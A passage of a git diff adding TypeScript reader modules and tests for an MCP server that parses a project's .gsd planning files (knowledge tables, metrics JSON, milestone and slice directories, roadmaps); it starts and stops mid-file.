+    if (cells[0].startsWith('#') || cells[0].startsWith('-')) continue;
+
+    const id = cells[0];
+    if (!/^[KPL]\d+$/i.test(id)) continue;
+
+    if (type === 'rule' && cells.length >= 5) {
+      entries.push({
+        id, type, scope: cells[1], content: cells[2], addedAt: cells[4] ?? '',
+      });
+    } else if (type === 'pattern' && cells.length >= 4) {
+      entries.push({
+        id, type, scope: cells[2] ?? '', content: cells[1], addedAt: cells[3] ?? '',
+      });
+    } else if (type === 'lesson' && cells.length >= 5) {
+      entries.push({
+        id, type, scope: cells[4] ?? '',
+        content: `${cells[1]} — Root cause: ${cells[2]} — Fix: ${cells[3]}`,
+        addedAt: '',
+      });
+    }
+  }
+
+  return entries;
+}
+
+function parseKnowledgeMarkdown(content: string): KnowledgeEntry[] {
+  const entries: KnowledgeEntry[] = [];
+
+  // Find ## Rules section
+  const rulesMatch = content.match(/## Rules\s*\n([\s\S]*?)(?=\n## |$)/i);
+  if (rulesMatch) {
+    entries.push(...parseTableRows(rulesMatch[1], 'rule'));
+  }
+
+  // Find ## Patterns section
+  const patternsMatch = content.match(/## Patterns\s*\n([\s\S]*?)(?=\n## |$)/i);
+  if (patternsMatch) {
+    entries.push(...parseTableRows(patternsMatch[1], 'pattern'));
+  }
+
+  // Find ## Lessons Learned section
+  const lessonsMatch = content.match(/## Lessons Learned\s*\n([\s\S]*?)(?=\n## |$)/i);
+  if (lessonsMatch) {
+    entries.push(...parseTableRows(lessonsMatch[1], 'lesson'));
+  }
+
+  return entries;
+}
+
+// ---------------------------------------------------------------------------
+// Public API
+// ---------------------------------------------------------------------------
+
+export function readKnowledge(projectDir: string): KnowledgeResult {
+  const gsd = resolveGsdRoot(projectDir);
+  const knowledgePath = resolveRootFile(gsd, 'KNOWLEDGE.md');
+
+  if (!existsSync(knowledgePath)) {
+    return { entries: [], counts: { rules: 0, patterns: 0, lessons: 0 } };
+  }
+
+  const content = readFileSync(knowledgePath, 'utf-8');
+  const entries = parseKnowledgeMarkdown(content);
+
+  return {
+    entries,
+    counts: {
+      rules: entries.filter((e) => e.type === 'rule').length,
+      patterns: entries.filter((e) => e.type === 'pattern').length,
+      lessons: entries.filter((e) => e.type === 'lesson').length,
+    },
+  };
+}
diff --git a/packages/mcp-server/src/readers/metrics.ts b/packages/mcp-server/src/readers/metrics.ts
new file mode 100644
index 000000000..0b6635ceb
--- /dev/null
+++ b/packages/mcp-server/src/readers/metrics.ts
@@ -0,0 +1,118 @@
+// GSD MCP Server — metrics/history reader
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { readFileSync, existsSync } from 'node:fs';
+import { resolveGsdRoot, resolveRootFile } from './paths.js';
+
+// ---------------------------------------------------------------------------
+// Types
+// ---------------------------------------------------------------------------
+
+export interface MetricsUnit {
+  type: string;
+  id: string;
+  model: string;
+  startedAt: number;
+  finishedAt: number;
+  tokens: {
+    input: number;
+    output: number;
+    cacheRead: number;
+    cacheWrite: number;
+    total: number;
+  };
+  cost: number;
+  toolCalls: number;
+  apiRequests: number;
+}
+
+export interface HistoryResult {
+  entries: MetricsUnit[];
+  totals: {
+    cost: number;
+    tokens: { input: number; output: number; total: number };
+    units: number;
+    durationMs: number;
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Parser
+// ---------------------------------------------------------------------------
+
+function parseMetricsJson(content: string): MetricsUnit[] {
+  try {
+    const data = JSON.parse(content);
+    if (!data.units || !Array.isArray(data.units)) return [];
+
+    return data.units.map((u: Record<string, unknown>) => ({
+      type: String(u.type ?? 'unknown'),
+      id: String(u.id ?? ''),
+      model: String(u.model ?? 'unknown'),
+      startedAt: Number(u.startedAt ?? 0),
+      finishedAt: Number(u.finishedAt ?? 0),
+      tokens: {
+        input: Number((u.tokens as Record<string, unknown>)?.input ?? 0),
+        output: Number((u.tokens as Record<string, unknown>)?.output ?? 0),
+        cacheRead: Number((u.tokens as Record<string, unknown>)?.cacheRead ?? 0),
+        cacheWrite: Number((u.tokens as Record<string, unknown>)?.cacheWrite ?? 0),
+        total: Number((u.tokens as Record<string, unknown>)?.total ?? 0),
+      },
+      cost: Number(u.cost ?? 0),
+      toolCalls: Number(u.toolCalls ?? 0),
+      apiRequests: Number(u.apiRequests ?? 0),
+    }));
+  } catch {
+    return [];
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Public API
+// ---------------------------------------------------------------------------
+
+export function readHistory(projectDir: string, limit?: number): HistoryResult {
+  const gsd = resolveGsdRoot(projectDir);
+
+  // metrics.json (primary)
+  const metricsPath = resolveRootFile(gsd, 'metrics.json');
+  let units: MetricsUnit[] = [];
+
+  if (existsSync(metricsPath)) {
+    const content = readFileSync(metricsPath, 'utf-8');
+    units = parseMetricsJson(content);
+  }
+
+  // Sort by startedAt descending (most recent first)
+  units.sort((a, b) => b.startedAt - a.startedAt);
+
+  // Apply limit
+  if (limit && limit > 0) {
+    units = units.slice(0, limit);
+  }
+
+  // Compute totals from ALL units (not just limited set)
+  const allUnits = existsSync(metricsPath)
+    ? parseMetricsJson(readFileSync(metricsPath, 'utf-8'))
+    : [];
+
+  const totals = {
+    cost: 0,
+    tokens: { input: 0, output: 0, total: 0 },
+    units: allUnits.length,
+    durationMs: 0,
+  };
+
+  for (const u of allUnits) {
+    totals.cost += u.cost;
+    totals.tokens.input += u.tokens.input;
+    totals.tokens.output += u.tokens.output;
+    totals.tokens.total += u.tokens.total;
+    totals.durationMs += (u.finishedAt - u.startedAt);
+  }
+
+  // Round cost to 4 decimal places
+  totals.cost = Math.round(totals.cost * 10000) / 10000;
+
+  return { entries: units, totals };
+}
diff --git a/packages/mcp-server/src/readers/paths.ts b/packages/mcp-server/src/readers/paths.ts
new file mode 100644
index 000000000..ad0418a36
--- /dev/null
+++ b/packages/mcp-server/src/readers/paths.ts
@@ -0,0 +1,217 @@
+// GSD MCP Server — .gsd/ directory resolution
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { existsSync, statSync, readdirSync } from 'node:fs';
+import { join, resolve, dirname, basename } from 'node:path';
+import { execFileSync } from 'node:child_process';
+
+/**
+ * Resolve the .gsd/ root directory for a project.
+ *
+ * Probes in order:
+ *   1. projectDir/.gsd (fast path)
+ *   2. git repo root/.gsd
+ *   3. Walk up from projectDir
+ *   4. Fallback: projectDir/.gsd (even if missing — for init)
+ */
+export function resolveGsdRoot(projectDir: string): string {
+  const resolved = resolve(projectDir);
+
+  // Fast path: .gsd/ in the given directory
+  const direct = join(resolved, '.gsd');
+  if (existsSync(direct) && statSync(direct).isDirectory()) {
+    return direct;
+  }
+
+  // Try git repo root
+  try {
+    const gitRoot = execFileSync('git', ['rev-parse', '--show-toplevel'], {
+      cwd: resolved,
+      encoding: 'utf-8',
+      stdio: ['pipe', 'pipe', 'pipe'],
+    }).trim();
+    const gitGsd = join(gitRoot, '.gsd');
+    if (existsSync(gitGsd) && statSync(gitGsd).isDirectory()) {
+      return gitGsd;
+    }
+  } catch {
+    // Not a git repo or git not available
+  }
+
+  // Walk up from projectDir
+  let dir = resolved;
+  while (dir !== dirname(dir)) {
+    const candidate = join(dir, '.gsd');
+    if (existsSync(candidate) && statSync(candidate).isDirectory()) {
+      return candidate;
+    }
+    dir = dirname(dir);
+  }
+
+  // Fallback
+  return direct;
+}
+
+/** Resolve path to a .gsd/ root file (STATE.md, KNOWLEDGE.md, etc.) */
+export function resolveRootFile(gsdRoot: string, name: string): string {
+  return join(gsdRoot, name);
+}
+
+/** Resolve path to milestones directory */
+export function milestonesDir(gsdRoot: string): string {
+  return join(gsdRoot, 'milestones');
+}
+
+/**
+ * Find all milestone directory IDs (M001, M002, etc.).
+ * Handles both bare (M001/) and descriptor (M001-FLIGHT-SIM/) naming.
+ */
+export function findMilestoneIds(gsdRoot: string): string[] {
+  const dir = milestonesDir(gsdRoot);
+  if (!existsSync(dir)) return [];
+
+  const entries = readdirSync(dir, { withFileTypes: true });
+  const ids: string[] = [];
+
+  for (const entry of entries) {
+    if (!entry.isDirectory()) continue;
+    const match = entry.name.match(/^(M\d+)/);
+    if (match) ids.push(match[1]);
+  }
+
+  return ids.sort();
+}
+
+/**
+ * Resolve the actual directory name for a milestone ID.
+ * M001 might live in M001/ or M001-SOME-DESCRIPTOR/.
+ */
+export function resolveMilestoneDir(gsdRoot: string, milestoneId: string): string | null {
+  const dir = milestonesDir(gsdRoot);
+  if (!existsSync(dir)) return null;
+
+  // Fast path: exact match
+  const exact = join(dir, milestoneId);
+  if (existsSync(exact) && statSync(exact).isDirectory()) return exact;
+
+  // Prefix match
+  const entries = readdirSync(dir, { withFileTypes: true });
+  for (const entry of entries) {
+    if (entry.isDirectory() && entry.name.startsWith(milestoneId)) {
+      return join(dir, entry.name);
+    }
+  }
+
+  return null;
+}
+
+/**
+ * Resolve a milestone-level file (M001-ROADMAP.md, M001-CONTEXT.md, etc.).
+ * Handles various naming conventions.
+ */
+export function resolveMilestoneFile(gsdRoot: string, milestoneId: string, suffix: string): string | null {
+  const mDir = resolveMilestoneDir(gsdRoot, milestoneId);
+  if (!mDir) return null;
+
+  const dirName = basename(mDir);
+
+  // Try: M001-ROADMAP.md, then DIRNAME-ROADMAP.md
+  const candidates = [
+    join(mDir, `${milestoneId}-${suffix}.md`),
+    join(mDir, `${dirName}-${suffix}.md`),
+    join(mDir, `${suffix}.md`),
+  ];
+
+  for (const c of candidates) {
+    if (existsSync(c)) return c;
+  }
+  return null;
+}
+
+/** Find all slice IDs within a milestone (S01, S02, etc.) */
+export function findSliceIds(gsdRoot: string, milestoneId: string): string[] {
+  const mDir = resolveMilestoneDir(gsdRoot, milestoneId);
+  if (!mDir) return [];
+
+  const slicesDir = join(mDir, 'slices');
+  if (!existsSync(slicesDir)) return [];
+
+  const entries = readdirSync(slicesDir, { withFileTypes: true });
+  const ids: string[] = [];
+
+  for (const entry of entries) {
+    if (!entry.isDirectory()) continue;
+    const match = entry.name.match(/^(S\d+)/);
+    if (match) ids.push(match[1]);
+  }
+
+  return ids.sort();
+}
+
+/** Resolve the actual directory for a slice */
+export function resolveSliceDir(gsdRoot: string, milestoneId: string, sliceId: string): string | null {
+  const mDir = resolveMilestoneDir(gsdRoot, milestoneId);
+  if (!mDir) return null;
+
+  const slicesDir = join(mDir, 'slices');
+  if (!existsSync(slicesDir)) return null;
+
+  const exact = join(slicesDir, sliceId);
+  if (existsSync(exact) && statSync(exact).isDirectory()) return exact;
+
+  const entries = readdirSync(slicesDir, { withFileTypes: true });
+  for (const entry of entries) {
+    if (entry.isDirectory() && entry.name.startsWith(sliceId)) {
+      return join(slicesDir, entry.name);
+    }
+  }
+  return null;
+}
+
+/** Resolve a slice-level file (S01-PLAN.md, etc.) */
+export function resolveSliceFile(
+  gsdRoot: string, milestoneId: string, sliceId: string, suffix: string,
+): string | null {
+  const sDir = resolveSliceDir(gsdRoot, milestoneId, sliceId);
+  if (!sDir) return null;
+
+  const dirName = basename(sDir);
+  const candidates = [
+    join(sDir, `${sliceId}-${suffix}.md`),
+    join(sDir, `${dirName}-${suffix}.md`),
+    join(sDir, `${suffix}.md`),
+  ];
+
+  for (const c of candidates) {
+    if (existsSync(c)) return c;
+  }
+  return null;
+}
+
+/** Find all task files in a slice's tasks/ directory */
+export function findTaskFiles(
+  gsdRoot: string, milestoneId: string, sliceId: string,
+): Array<{ id: string; hasPlan: boolean; hasSummary: boolean }> {
+  const sDir = resolveSliceDir(gsdRoot, milestoneId, sliceId);
+  if (!sDir) return [];
+
+  const tasksDir = join(sDir, 'tasks');
+  if (!existsSync(tasksDir)) return [];
+
+  const files = readdirSync(tasksDir);
+  const taskMap = new Map<string, { hasPlan: boolean; hasSummary: boolean }>();
+
+  for (const f of files) {
+    const match = f.match(/^(T\d+).*-(PLAN|SUMMARY)\.md$/i);
+    if (!match) continue;
+    const [, id, type] = match;
+    const existing = taskMap.get(id) ?? { hasPlan: false, hasSummary: false };
+    if (type.toUpperCase() === 'PLAN') existing.hasPlan = true;
+    if (type.toUpperCase() === 'SUMMARY') existing.hasSummary = true;
+    taskMap.set(id, existing);
+  }
+
+  return Array.from(taskMap.entries())
+    .map(([id, info]) => ({ id, ...info }))
+    .sort((a, b) => a.id.localeCompare(b.id));
+}
diff --git a/packages/mcp-server/src/readers/readers.test.ts b/packages/mcp-server/src/readers/readers.test.ts
new file mode 100644
index 000000000..98d157279
--- /dev/null
+++ b/packages/mcp-server/src/readers/readers.test.ts
@@ -0,0 +1,509 @@
+// GSD MCP Server — reader tests
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { describe, it, before, after } from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdirSync, writeFileSync, rmSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+import { randomBytes } from 'node:crypto';
+
+import { readProgress } from './state.js';
+import { readRoadmap } from './roadmap.js';
+import { readHistory } from './metrics.js';
+import { readCaptures } from './captures.js';
+import { readKnowledge } from './knowledge.js';
+import { runDoctorLite } from './doctor-lite.js';
+
+// ---------------------------------------------------------------------------
+// Test fixture helpers
+// ---------------------------------------------------------------------------
+
+function tmpProject(): string {
+  const dir = join(tmpdir(), `gsd-mcp-test-${randomBytes(4).toString('hex')}`);
+  mkdirSync(dir, { recursive: true });
+  return dir;
+}
+
+function writeFixture(base: string, relPath: string, content: string): void {
+  const full = join(base, relPath);
+  mkdirSync(join(full, '..'), { recursive: true });
+  writeFileSync(full, content, 'utf-8');
+}
+
+// ---------------------------------------------------------------------------
+// readProgress tests
+// ---------------------------------------------------------------------------
+
+describe('readProgress', () => {
+  let projectDir: string;
+
+  before(() => {
+    projectDir = tmpProject();
+
+    writeFixture(projectDir, '.gsd/STATE.md', `# GSD State
+
+**Active Milestone:** M002: Auth System
+**Active Slice:** S01: Login flow
+**Phase:** execution
+**Requirements Status:** 5 active · 2 validated · 1 deferred · 0 out of scope
+
+## Milestone Registry
+
+- ☑ **M001:** Core Setup
+- 🔄 **M002:** Auth System
+- ⬜ **M003:** Dashboard
+
+## Blockers
+
+- Waiting on OAuth provider approval
+
+## Next Action
+
+Execute T02 in S01 — implement token refresh.
+`);
+
+    // Create filesystem structure
+    const m1 = '.gsd/milestones/M001/slices/S01/tasks';
+    writeFixture(projectDir, `${m1}/T01-PLAN.md`, '# T01');
+    writeFixture(projectDir, `${m1}/T01-SUMMARY.md`, '# T01 done');
+
+    const m2 = '.gsd/milestones/M002/slices/S01/tasks';
+    writeFixture(projectDir, `${m2}/T01-PLAN.md`, '# T01');
+    writeFixture(projectDir, `${m2}/T01-SUMMARY.md`, '# T01 done');
+    writeFixture(projectDir, `${m2}/T02-PLAN.md`, '# T02');
+
+    mkdirSync(join(projectDir, '.gsd/milestones/M003'), { recursive: true });
+  });
+
+  after(() => rmSync(projectDir, { recursive: true, force: true }));
+
+  it('parses active milestone from STATE.md', () => {
+    const result = readProgress(projectDir);
+    assert.deepEqual(result.activeMilestone, { id: 'M002', title: 'Auth System' });
+  });
+
+  it('parses active slice', () => {
+    const result = readProgress(projectDir);
+    assert.deepEqual(result.activeSlice, { id: 'S01', title: 'Login flow' });
+  });
+
+  it('parses phase', () => {
+    const result = readProgress(projectDir);
+    assert.equal(result.phase, 'execute');
+  });
+
+  it('parses milestone counts from registry', () => {
+    const result = readProgress(projectDir);
+    assert.equal(result.milestones.total, 3);
+    assert.equal(result.milestones.done, 1);
+    assert.equal(result.milestones.active, 1);
+    assert.equal(result.milestones.pending, 1);
+  });
+
+  it('counts tasks from filesystem', () => {
+    const result = readProgress(projectDir);
+    assert.equal(result.tasks.total, 3);
+    assert.equal(result.tasks.done, 2);
+    assert.equal(result.tasks.pending, 1);
+  });
+
+  it('parses blockers', () => {
+    const result = readProgress(projectDir);
+    assert.equal(result.blockers.length, 1);
+    assert.ok(result.blockers[0].includes('OAuth'));
+  });
+
+  it('parses requirements', () => {
+    const result = readProgress(projectDir);
+    assert.equal(result.requirements?.active, 5);
+    assert.equal(result.requirements?.validated, 2);
+    assert.equal(result.requirements?.deferred, 1);
+  });
+
+  it('parses next action', () => {
+    const result = readProgress(projectDir);
+    assert.ok(result.nextAction.includes('T02'));
+  });
+
+  it('returns defaults for missing .gsd/', () => {
+    const empty = tmpProject();
+    const result = readProgress(empty);
+    assert.equal(result.phase, 'unknown');
+    assert.equal(result.milestones.total, 0);
+    rmSync(empty, { recursive: true, force: true });
+  });
+});
+
+// ---------------------------------------------------------------------------
+// readRoadmap tests
+// ---------------------------------------------------------------------------
+
+describe('readRoadmap', () => {
+  let projectDir: string;
+
+  before(() => {
+    projectDir = tmpProject();
+
+    writeFixture(projectDir, '.gsd/milestones/M001/M001-CONTEXT.md', '# M001: Core Setup\n');
+    writeFixture(projectDir, '.gsd/milestones/M001/M001-ROADMAP.md', `# M001: Core Setup
+
+## Vision
+
+Build the foundation for the project.
+
+## Slice Overview
+
+| ID | Slice | Risk | Depends | Done | After this |
+|----|-------|------|---------|------|------------|
+| S01 | Database schema | low | — | ☑ | DB ready |
+| S02 | API endpoints | medium | S01 | 🟫 | REST API live |
+`);
+
+    writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/S01-PLAN.md', `# S01: Database schema
+
+## Tasks
+
+- [x] **T01: Create migrations** — Set up schema
+- [x] **T02: Seed data** — Initial seed
+`);
+    writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01');
+    writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T01-SUMMARY.md', '# T01 done');
+    writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T02-PLAN.md', '# T02');
+    writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T02-SUMMARY.md', '# T02 done');
+
+    writeFixture(projectDir, '.gsd/milestones/M001/slices/S02/S02-PLAN.md', `# S02: API endpoints
+
+## Tasks
+
+- [ ] **T01: Auth routes** — Implement auth
+- [ ] **T02: User routes** — CRUD users
+`);
+    writeFixture(projectDir, '.gsd/milestones/M001/slices/S02/tasks/T01-PLAN.md', '# T01');
+    writeFixture(projectDir, '.gsd/milestones/M001/slices/S02/tasks/T02-PLAN.md', '# T02');
+  });
+
+  after(() => rmSync(projectDir, { recursive: true, force: true }));
+
+  it('returns milestone structure', () => {
+    const result = readRoadmap(projectDir);
+    assert.equal(result.milestones.length, 1);
+    assert.equal(result.milestones[0].id, 'M001');
+    assert.equal(result.milestones[0].title, 'Core Setup');
+  });
+
+  it('reads vision from roadmap', () => {
+    const result = readRoadmap(projectDir);
+    assert.ok(result.milestones[0].vision.includes('foundation'));
+  });
+
+  it('parses slices from roadmap table', () => {
+    const result = readRoadmap(projectDir);
+    const slices = result.milestones[0].slices;
+    assert.equal(slices.length, 2);
+    assert.equal(slices[0].id, 'S01');
+    assert.equal(slices[0].title, 'Database schema');
+    assert.equal(slices[1].id, 'S02');
+  });
+
+  it('derives slice status from task summaries', () => {
+    const result = readRoadmap(projectDir);
+    const slices = result.milestones[0].slices;
+    assert.equal(slices[0].status, 'done');
+    assert.equal(slices[1].status, 'pending');
+  });
+
+  it('includes tasks in slices', () => {
+    const result = readRoadmap(projectDir);
+    const s01Tasks = result.milestones[0].slices[0].tasks;
+    assert.equal(s01Tasks.length, 2);
+    assert.equal(s01Tasks[0].status, 'done');
+  });
+
+  it('filters by milestoneId', () => {
+    const result = readRoadmap(projectDir, 'M999');
+    assert.equal(result.milestones.length, 0);
+  });
+});
+
+// ---------------------------------------------------------------------------
+// readHistory tests
+// ---------------------------------------------------------------------------
+
+describe('readHistory', () => {
+  let projectDir: string;
+
+  before(() => {
+    projectDir = tmpProject();
+    writeFixture(projectDir, '.gsd/metrics.json', JSON.stringify({
+      version: 1,
+      projectStartedAt: 1700000000000,
+      units: [
+        {
+          type: 'execute-task',
+          id: 'M001/S01/T01',
+          model: 'claude-sonnet-4',
+          startedAt: 1700001000000,
+          finishedAt: 1700002000000,
+          tokens: { input: 10000, output: 3000, cacheRead: 2000, cacheWrite: 1000, total: 16000 },
+          cost: 0.05,
+          toolCalls: 8,
+          apiRequests: 3,
+        },
+        {
+          type: 'execute-task',
+          id: 'M001/S01/T02',
+          model: 'claude-sonnet-4',
+          startedAt: 1700003000000,
+          finishedAt: 1700004000000,
+          tokens: { input: 15000, output: 5000, cacheRead: 3000, cacheWrite: 1500, total: 24500 },
+          cost: 0.08,
+          toolCalls: 12,
+          apiRequests: 5,
+        },
+      ],
+    }));
+  });
+
+  after(() => rmSync(projectDir, { recursive: true, force: true }));
+
+  it('returns all entries sorted by most recent', () => {
+    const result = readHistory(projectDir);
+    assert.equal(result.entries.length, 2);
+    assert.equal(result.entries[0].id, 'M001/S01/T02'); // most recent first
+  });
+
+  it('computes totals', () => {
+    const result = readHistory(projectDir);
+    assert.equal(result.totals.units, 2);
+    assert.equal(result.totals.cost, 0.13);
+    assert.equal(result.totals.tokens.total, 40500);
+  });
+
+  it('respects limit', () => {
+    const result = readHistory(projectDir, 1);
+    assert.equal(result.entries.length, 1);
+    assert.equal(result.totals.units, 2); // totals still reflect all
+  });
+
+  it('returns empty for missing metrics', () => {
+    const empty = tmpProject();
+    mkdirSync(join(empty, '.gsd'), { recursive: true });
+    const result = readHistory(empty);
+    assert.equal(result.entries.length, 0);
+    assert.equal(result.totals.units, 0);
+    rmSync(empty, { recursive: true, force: true });
+  });
+});
+
+// ---------------------------------------------------------------------------
+// readCaptures tests
+// ---------------------------------------------------------------------------
+
+describe('readCaptures', () => {
+  let projectDir: string;
+
+  before(() => {
+    projectDir = tmpProject();
+    writeFixture(projectDir, '.gsd/CAPTURES.md', `# Captures
+
+### CAP-aaa11111
+
+**Text:** Add rate limiting to API
+**Captured:** 2026-04-01T10:00:00Z
+**Status:** pending
+
+### CAP-bbb22222
+
+**Text:** Refactor auth module
+**Captured:** 2026-04-02T10:00:00Z
+**Status:** resolved
+**Classification:** inject
+**Resolution:** Added to M003 roadmap
+**Rationale:** Important for security
+**Resolved:** 2026-04-03T10:00:00Z
+**Milestone:** M003
+
+### CAP-ccc33333
+
+**Text:** Nice to have: dark mode
+**Captured:** 2026-04-02T11:00:00Z
+**Status:** resolved
+**Classification:** defer
+**Resolution:** Deferred to future
+**Rationale:** Not blocking
+**Resolved:** 2026-04-03T11:00:00Z
+`);
+  });
+
+  after(() => rmSync(projectDir, { recursive: true, force: true }));
+
+  it('reads all captures', () => {
+    const result = readCaptures(projectDir, 'all');
+    assert.equal(result.captures.length, 3);
+    assert.equal(result.counts.total, 3);
+  });
+
+  it('filters pending captures', () => {
+    const result = readCaptures(projectDir, 'pending');
+    assert.equal(result.captures.length, 1);
+    assert.equal(result.captures[0].id, 'CAP-aaa11111');
+  });
+
+  it('filters actionable captures (inject, replan, quick-task)', () => {
+    const result = readCaptures(projectDir, 'actionable');
+    assert.equal(result.captures.length, 1);
+    assert.equal(result.captures[0].id, 'CAP-bbb22222');
+  });
+
+  it('counts correctly regardless of filter', () => {
+    const result = readCaptures(projectDir, 'pending');
+    assert.equal(result.counts.total, 3);
+    assert.equal(result.counts.pending, 1);
+    assert.equal(result.counts.actionable, 1);
+  });
+
+  it('returns empty for missing CAPTURES.md', () => {
+    const empty = tmpProject();
+    mkdirSync(join(empty, '.gsd'), { recursive: true });
+    const result = readCaptures(empty);
+    assert.equal(result.captures.length, 0);
+    rmSync(empty, { recursive: true, force: true });
+  });
+});
+
+// ---------------------------------------------------------------------------
+// readKnowledge tests
+// ---------------------------------------------------------------------------
+
+describe('readKnowledge', () => {
+  let projectDir: string;
+
+  before(() => {
+    projectDir = tmpProject();
+    writeFixture(projectDir, '.gsd/KNOWLEDGE.md', `# Project Knowledge
+
+## Rules
+
+| # | Scope | Rule | Why | Added |
+|---|-------|------|-----|-------|
+| K001 | auth | Hash passwords with bcrypt | Security requirement | manual |
+| K002 | db | Use transactions for multi-table | Data consistency | auto |
+
+## Patterns
+
+| # | Pattern | Where | Notes |
+|---|---------|-------|-------|
+| P001 | Singleton services | services/ | Prevents duplication |
+
+## Lessons Learned
+
+| # | What Happened | Root Cause | Fix | Scope |
+|---|--------------|------------|-----|-------|
+| L001 | CI tests failed | Env diff | Added setup script | testing |
+`);
+  });
+
+  after(() => rmSync(projectDir, { recursive: true, force: true }));
+
+  it('reads all knowledge entries', () => {
+    const result = readKnowledge(projectDir);
+    assert.equal(result.entries.length, 4);
+  });
+
+  it('counts by type', () => {
+    const result = readKnowledge(projectDir);
+    assert.equal(result.counts.rules, 2);
+    assert.equal(result.counts.patterns, 1);
+    assert.equal(result.counts.lessons, 1);
+  });
+
+  it('parses rule fields correctly', () => {
+    const result = readKnowledge(projectDir);
+    const k001 = result.entries.find((e) => e.id === 'K001');
+    assert.ok(k001);
+    assert.equal(k001.type, 'rule');
+    assert.equal(k001.scope, 'auth');
+    assert.ok(k001.content.includes('bcrypt'));
+  });
+
+  it('returns empty for missing KNOWLEDGE.md', () => {
+    const empty = tmpProject();
+    mkdirSync(join(empty, '.gsd'), { recursive: true });
+    const result = readKnowledge(empty);
+    assert.equal(result.entries.length, 0);
+    rmSync(empty, { recursive: true, force: true });
+  });
+});
+
+// ---------------------------------------------------------------------------
+// runDoctorLite tests
+// ---------------------------------------------------------------------------
+
+describe('runDoctorLite', () => {
+  let projectDir: string;
+
+  before(() => {
+    projectDir = tmpProject();
+
+    // M001: complete milestone (has summary)
+    writeFixture(projectDir, '.gsd/PROJECT.md', '# Test Project');
+    writeFixture(projectDir, '.gsd/STATE.md', '# GSD State');
+    writeFixture(projectDir, '.gsd/milestones/M001/M001-CONTEXT.md', '# M001');
+    writeFixture(projectDir, '.gsd/milestones/M001/M001-ROADMAP.md', '# Roadmap');
+    writeFixture(projectDir, '.gsd/milestones/M001/M001-SUMMARY.md', '# Done');
+    writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/S01-PLAN.md', '# Plan');
+    writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T01-PLAN.md', '# T01');
+    writeFixture(projectDir, '.gsd/milestones/M001/slices/S01/tasks/T01-SUMMARY.md', '# T01 done');
+
+    // M002: incomplete — has all tasks done but no SUMMARY
+    writeFixture(projectDir, '.gsd/milestones/M002/M002-CONTEXT.md', '# M002');
+    writeFixture(projectDir, '.gsd/milestones/M002/M002-ROADMAP.md', '# Roadmap');
+    writeFixture(projectDir, '.gsd/milestones/M002/slices/S01/S01-PLAN.md', '# Plan');
+    writeFixture(projectDir, '.gsd/milestones/M002/slices/S01/tasks/T01-PLAN.md', '# T01');
+    writeFixture(projectDir, '.gsd/milestones/M002/slices/S01/tasks/T01-SUMMARY.md', '# T01 done');
+
+    // M003: empty — no context, no slices
+    mkdirSync(join(projectDir, '.gsd/milestones/M003'), { recursive: true });
+  });
+
+  after(() => rmSync(projectDir, { recursive: true, force: true }));
+
+  it('detects all-slices-done-missing-summary', () => {
+    const result = runDoctorLite(projectDir);
+    const issue = result.issues.find((i) => i.code === 'all_slices_done_missing_summary');
+    assert.ok(issue, 'Should detect M002 missing summary');
+    assert.equal(issue.unitId, 'M002');
+  });
+
+  it('detects missing context', () => {
+    const result = runDoctorLite(projectDir);
+    const issue = result.issues.find(
+      (i) => i.code === 'missing_context' && i.unitId === 'M003',
+    );
+    assert.ok(issue, 'Should detect M003 missing context');
+  });
+
+  it('scopes to a single milestone', () => {
+    const result = runDoctorLite(projectDir, 'M001');
+    const m002Issues = result.issues.filter((i) => i.unitId.startsWith('M002'));
+    assert.equal(m002Issues.length, 0, 'Should not include M002 when scoped to M001');
+  });
+
+  it('returns ok:true for healthy project', () => {
+    const healthy = tmpProject();
+    writeFixture(healthy, '.gsd/PROJECT.md', '# Project');
+    writeFixture(healthy, '.gsd/STATE.md', '# State');
+    const result = runDoctorLite(healthy);
+    assert.equal(result.ok, true);
+    rmSync(healthy, { recursive: true, force: true });
+  });
+
+  it('handles missing .gsd/ gracefully', () => {
+    const empty = tmpProject();
+    const result = runDoctorLite(empty);
+    assert.equal(result.ok, true);
+    assert.equal(result.issues[0].code, 'no_gsd_directory');
+    rmSync(empty, { recursive: true, force: true });
+  });
+});
diff --git a/packages/mcp-server/src/readers/roadmap.ts b/packages/mcp-server/src/readers/roadmap.ts
new file mode 100644
index 000000000..29a6e1941
--- /dev/null
+++ b/packages/mcp-server/src/readers/roadmap.ts
@@ -0,0 +1,263 @@
+// GSD MCP Server — roadmap structure reader
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { readFileSync, existsSync } from 'node:fs';
+import {
+  resolveGsdRoot,
+  findMilestoneIds,
+  resolveMilestoneFile,
+  findSliceIds,
+  resolveSliceFile,
+  findTaskFiles,
+} from './paths.js';
+
+// ---------------------------------------------------------------------------
+// Types
+// ---------------------------------------------------------------------------
+
+export interface TaskInfo {
+  id: string;
+  title: string;
+  status: 'done' | 'pending';
+}
+
+export interface SliceInfo {
+  id: string;
+  title: string;
+  status: 'done' | 'active' | 'pending';
+  risk: string;
+  depends: string[];
+  demo: string;
+  tasks: TaskInfo[];
+}
+
+export interface MilestoneInfo {
+  id: string;
+  title: string;
+  status: 'done' | 'active' | 'pending' | 'parked';
+  vision: string;
+  slices: SliceInfo[];
+}
+
+export interface RoadmapResult {
+  milestones: MilestoneInfo[];
+}
+
+// ---------------------------------------------------------------------------
+// ROADMAP.md table parser
+// ---------------------------------------------------------------------------
+
+function parseRoadmapTable(content: string): Array<{
+  id: string; title: string; risk: string; depends: string[]; done: boolean; demo: string;
+}> {
+  const results: Array<{
+    id: string; title: string; risk: string; depends: string[]; done: boolean; demo: string;
+  }> = [];
+
+  // Try table format first: | S01 | Title | risk | depends | done-icon | demo |
